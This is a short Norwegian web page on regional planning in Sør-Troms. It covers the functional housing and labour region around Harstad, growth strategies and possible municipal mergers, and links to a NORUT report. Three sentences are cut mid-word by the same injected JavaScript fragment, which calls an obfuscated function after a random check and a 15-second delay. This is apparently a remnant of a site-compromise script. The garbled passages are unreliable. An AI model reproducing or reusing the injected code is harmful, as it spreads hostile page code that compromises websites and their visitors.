Samferdsel

I Sør-Tromsregionen ligger den funksjonelle Bolig- og arbeidsregionen rundt Harstad og består av Harstad, Kvæfjord, Skånlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and, Ibestad, Evenes og Tjeldsund. Gratangen er forbundet med Narvik-regionen og Salangen er mer orientert mot MidtTroms. Samtidig ser vi andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre former for funksjonalitet i en del interkommunale tjenester, og når det gjelder utdanning.

Ulike strategier for vekst bør ta utgangspunkt i den funksjonelle regionen for det aktuelle området. For Sør-Tromsregionen betyr dette f.eks. at regional næringsplanlegging kan gjøres med basis i en to- eller tredeling, der Harstadregionen utgjør en del og Salangen, Lavangen og Gratangen utgjør en del, eller at næringsplanlegging for de tre sistnevnte ses i sammenheng med de BA-regionene de naturlig hører til. Hvordan nye satsinger for vekst i Sør-Tromsregionen skal foregå, og tiltak utformes, bør også vurderes med henblikk på en fremtidig kommune- og regionstruktur.

Det er god grunn til å tro at det vil skje endringer her de nærmeste årene. I de endringene som er utredet i Telemarksforsknings rapport om kommunestruktur i Ofoten (Lie m.fl. 2014) er det vektlagt at større kommuner vil ha større handom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andlekraft for lokal samfunnsutvikling gjennom blant annet å kunne se et større geografisk område i sammenheng. Slik sett kan det tenkes at sammenslåing vil være en riktig løsning for en del av kommunene i SørTroms, også vurdert i sammenheng med kommuner i Ofoten og Midt-Troms.Det kan også tenkes at når mange peker på at regionrådet er for konsensusorientert, kan dette bunne i et underliggende ønske om et organ med beslutningsmyndighet over et større geografisk område enn dagens kommuner utgjør.

Link til hele rapporten fra NORUT